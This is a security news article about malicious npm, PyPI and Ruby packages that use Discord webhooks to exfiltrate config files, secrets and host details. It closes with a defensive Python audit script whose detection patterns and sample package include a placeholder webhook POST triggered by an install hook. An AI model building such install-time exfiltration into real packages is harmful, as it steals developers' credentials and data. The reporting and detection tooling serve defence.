Sunday, April 5, 2026

Discord Weaponized as C2 Server Across Popular Open-Source Package Repositories

Malicious packages on popular registries are abusing Discord webhooks to exfiltrate sensitive files and host telemetry, bypassing traditional C2 infrastructure and blending into legitimate HTTPS traffic.

Discord webhooks are simple HTTPS URLs that accept POST requests; they require no credentials beyond possession of the URL, and traffic appears as innocent JSON over port 443.

Socket’s Threat Research Team has uncovered a growing trend wherein attackers embed Discord webhook URLs into open-source packages to serve as command and control (C2) endpoints.

When a package’s installation or runtime code sends a payload to these webhooks, the attacker sees files, host details, or custom messages in a Discord channel they control.

Unlike classic C2 servers, webhooks ride on a trusted domain, evade firewall blocks, and rarely trigger signature-based detection.

npm Package Dropper Examples

In an npm package named mysql-dumpdiscord, the index.js script targets common configuration files—config.json, config.js, .env, ayarlar.json, and ayarlar.js—by resolving each filename’s absolute path and reading its content.

If the file exists, the script constructs a message: files under 1,900 characters are wrapped in a code block; longer files are truncated to 1,900 characters with a Turkish warning (‘Dosya çok büyük, kısaltıldı’).

This message is then POSTed as JSON to a hard-coded Discord webhook URL. The result is a simple file exfiltration dropper that uses Discord rather than a proprietary C2 server.

A second npm module, nodejs.discord, contains just a DiscordWebhook class. Its connect(…messages) method concatenates any arguments into a string and, using Discord.js’s WebhookClient, sends them to another embedded webhook URL.

Errors are silently swallowed, allowing any code using this wrapper to exfiltrate arbitrary text—environment variables, API keys, or command outputs—without alerting users.

On PyPI, the malinssx package overrides setuptools’ install command in setup.py. Its RunPayload class sends a JSON payload announcing “Someone just installed the maladicus package via pip!” (originally in Vietnamese) to a Discord webhook before completing installation. This install-time hook poses a classic supply chain risk, giving attackers telemetry on every pip install without runtime execution.

Similarly, a malicious Ruby gem, sqlcommenter_rails, collects comprehensive host information—/etc/passwd contents, DNS servers from /etc/resolv.conf, hostname, current and home directories, and public IP via api.ipify.org.

It packages this data with gem metadata and custom notes into a formatted multi-line message, prints it to stdout, then POSTs it as JSON to a Discord webhook over HTTPS. Any network issues are quietly ignored, ensuring stealth.

Outlook and Defensive Measures

The weaponization of Discord webhooks flips the economics of supply chain attacks. Threat actors no longer need infrastructure costs or domain registration; they leverage free, resilient channels already allowed by organizations.

As webhook URLs are effectively write-only, they hide in code and firewall logs, evading detection. Beyond Discord, attackers are experimenting with Slack, Telegram, and GitHub webhooks for similar purposes.

Defenders must treat webhooks as potential data-loss channels. Egress filtering should enforce allow-lists for outbound HTTPS, especially from build servers and developer workstations.

Dependency management practices—lockfiles, provenance frameworks like SLSA, and strict vetting—are critical to block malicious packages before installation.

Runtime monitoring should flag code invoking network calls in install hooks or build scripts. Rotating developer credentials and minimizing stored secrets in repositories can limit exposure if exfiltration succeeds.
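The checks just described (install-time hooks, hard-coded webhook URLs, network calls in package code) can be expressed as a small static audit. The script below is an added example written for this article, not Socket's tooling or any of the packages' code; the sample package contents and the webhook URL are constructed placeholders, and the Discord webhook URL shape is assumed from its public format.

```python
import json
import re

# Discord webhook URLs have a fixed shape: a numeric id followed by an opaque token.
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")
# npm lifecycle scripts that execute during `npm install`
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# setup.py replacing setuptools' install command via cmdclass (the malinssx pattern)
SETUPTOOLS_HOOK_RE = re.compile(r"""cmdclass\s*=\s*\{[^}]*['"]install['"]""")
# Common outbound-HTTP entry points in JS, Python and Ruby package code
NET_CALL_RE = re.compile(
    r"\b(?:https?\.request|fetch\(|requests\.(?:post|get)|urlopen|WebhookClient|Net::HTTP)")

def find_webhooks(text):
    """Return the distinct Discord webhook URLs embedded in text."""
    return sorted(set(WEBHOOK_RE.findall(text)))

def audit_package(files):
    """files maps a relative path to its content; returns a list of findings."""
    findings = []
    for path, text in files.items():
        if path.endswith("package.json"):
            scripts = json.loads(text).get("scripts", {})
            for hook in sorted(NPM_INSTALL_HOOKS & set(scripts)):
                findings.append(f"{path}: install-time hook '{hook}' runs: {scripts[hook]}")
        if path.endswith("setup.py") and SETUPTOOLS_HOOK_RE.search(text):
            findings.append(f"{path}: overrides the setuptools install command")
        for url in find_webhooks(text):
            findings.append(f"{path}: hard-coded Discord webhook {url}")
        if NET_CALL_RE.search(text):
            findings.append(f"{path}: outbound network call")
    return findings

# Constructed sample package mimicking the patterns described above (not real package contents).
SAMPLE_PACKAGE = {
    "package.json": '{"name": "demo", "scripts": {"postinstall": "node index.js", "test": "jest"}}',
    "index.js": "const https = require('https');\n"
                "const hook = 'https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN';\n"
                "https.request(hook, {method: 'POST'}).end(JSON.stringify({content: 'hi'}));\n",
    "setup.py": "from setuptools import setup\nfrom setuptools.command.install import install\n"
                "class RunPayload(install):\n    def run(self):\n        install.run(self)\n"
                "setup(name='demo', cmdclass={'install': RunPayload})\n",
}

if __name__ == "__main__":
    for finding in audit_package(SAMPLE_PACKAGE):
        print(finding)
```

Run it over an unpacked tarball or a checkout before merging a dependency bump; a webhook URL plus an install hook in the same package is the combination this article's samples all share.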

Socket’s suite of security tools addresses these threats directly. Its GitHub App scans pull requests for hard-coded webhooks and install-time hooks.

The Socket CLI enforces the same checks during package installs. The Socket Firewall mediates dependency fetches, blocking known malicious packages transitively.

A browser extension highlights suspicious packages on registries, and AI-assisted coding tools warn when assistants suggest risky dependencies.

By shifting focus toward behavioral detection and supply chain hygiene, organizations can mitigate Discord-based C2 attacks before sensitive data ever leaves the developer’s machine.


Mayura Kathir
Mayura Kathir is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more.
